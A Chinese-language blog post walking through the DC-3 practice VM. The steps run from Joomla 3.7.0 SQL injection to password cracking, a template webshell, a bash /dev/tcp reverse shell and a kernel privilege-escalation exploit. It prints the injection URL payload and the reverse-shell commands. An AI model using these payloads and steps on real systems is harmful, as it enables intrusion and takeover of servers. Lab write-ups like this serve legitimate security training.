DC-3 靶机

靶机来源:https://www.five86.com

vmbox安装,启动。kali启动

靶机使用的是桥接模式,物理机确定网段192.168.123.0

nmap -sP 192.168.123.0/24

扫描存活主机,确定ip

192.168.123.27

浏览器插件wappalyzer确定了cms是Joomla

 dirsearch扫描一下

 

 后台:http://192.168.123.27/administrator/index.php

上网查了查这个,joomla,是国外一个挺不错的cms,也查到在Joomla!3.7.0中是存在注入的,找到一篇文章讲这个注入的,看不懂大佬写的,就拿最后的POC直接上了

https://www.cnblogs.com/yangxiaodi/p/6874314.html

确定目前的靶机是存在这个漏洞的

http://192.168.123.27/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x3a,concat(1,(select%20md5(1))),1)

 

 

 然后用sqlmap跑,前面都还正常,都跑出来了,然后发现一个表#__users,在我想跑这个表的信息的时候,却出了点问题

 

 sqlmap死活说找不到这个表

死活找不到。明明没问题。

 后来才知道,关于这个漏洞,网上有人写了专门的POC,点这里

使用很简单,直接在命令行下用python2运行就好了

 

关于查找cms漏洞这一步,在kali下有对joomla的专门的扫描工具。joomscan。和wordpress的wpscan一样。可以查到后台,版本等,拿到版本后可以用searchsploit来查找cms漏洞

 

 

之后就可以通过后面的目录

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
这个文件来看该漏洞的详细信息

 

这边就可以直接得到有用信息,后台用户名密码,关于密码,采用johnny,把密码写入到一个文件中,启动johnny,添加文件,执行,可以自动识别加密方式以及解密。当然也可以直接用john the ripper

解出来结果是snoopy。登陆后台

 

登陆后,

 

 

 

 

 

 在这里可以随意添加文件,上传一个简单的webshell上去,用蚁剑连接,

至于目录。

ip/templates/beez3/自己建立的文件目录

或ip/templates/protostar/自己建立的文件目录

连上蚁剑后,打开terminal,开始反弹shell

kali : nc -lvp 9966

terminal : bash -i >& /dev/tcp/192.168.87.130/9966 0>&1

但是出了点问题,

(新修改:

解决方式:bash -c 'bash -i >& /dev/tcp/192.168.123.41/1234 0>&1'  (这边kali的ip变了,是因为换到了桥接模式)

可以成功反弹,尽管还是报错了,但是kali有反应

 

 换个方式反弹,写一个php文件进去,执行,发现也是不行,报错:{"code":"ECONNABORTED","timeout":5000}

 后面感觉应该是网段原因,就把kali切换到桥接模式,再试一次,虽然还是会报这个错,但是kali那边已经有反应了

 

到kali后,开始提权

查看linux的版本信息

lsb_release -a

uname -a

 在kali用searchsploit搜索该版本(Ubuntu 16.04 )的有关漏洞

这样就找到了3个合适的漏洞

 

 一个一个来试

第一个:

cat /usr/share/exploitdb/exploits/linux_x86-64/local/40049.c
查看详情,这个是在exploit-db上的对应链接: https://www.exploit-db.com/exploits/40049

使用方法:

(同样来自https://www.exploit-db.com/exploits/40049)

文档里有写了两个c语言代码,打包成两个文件,上传到靶机中

蚁剑上传

 

 按教程一步一步操作

 gcc decr.c -m32 -O2 -o decr

gcc pwn.c -O2 -o pwn

这里出错了

 

 看不懂代码,,,先放在这里

第二个,

cat /usr/share/exploitdb/exploits/linux/local/47170.c
看了一下,只要把文件上传上去,编译运行就好了

 

然而又失败了,靶机处理器核心太少

第三个:

同样,先cat

cat /usr/share/exploitdb/exploits/linux/local/44300.c

和第一个差不多,两个文件,上传,编译,运行(名字都是一样的)

 

 

 还是tmd失败了      ++

 

看别人的博客才知道要用39772那个漏洞(他们怎么找到)

 cat /usr/share/exploitdb/exploits/linux/local/39772.txt
需要从gayhub上下载文件

 

 

文件下载失败,找不到该文件。

先这样吧

 

linux下下载失败是代理的问题(似乎)

windows下下载失败是我™的火狐和idm的问题,过了几天换个edge就屁事没有

 

把文件通过vmtool发送给kali

然后在kali本地搭建简易python  http环境

python -m SimpleHTTPServer

在shell里面wget下载这个文件

 

 解压

unzip

tar -xvf

按39772.txt里给的教程进行提权

进入ebpf_mapfd_doubleput_exploit

./compile.sh
./doubleput

等待几秒,提示出现就ok了

 


posted @ 2020-07-15 21:09  This_is_Y  阅读(651)  评论(0编辑  收藏  举报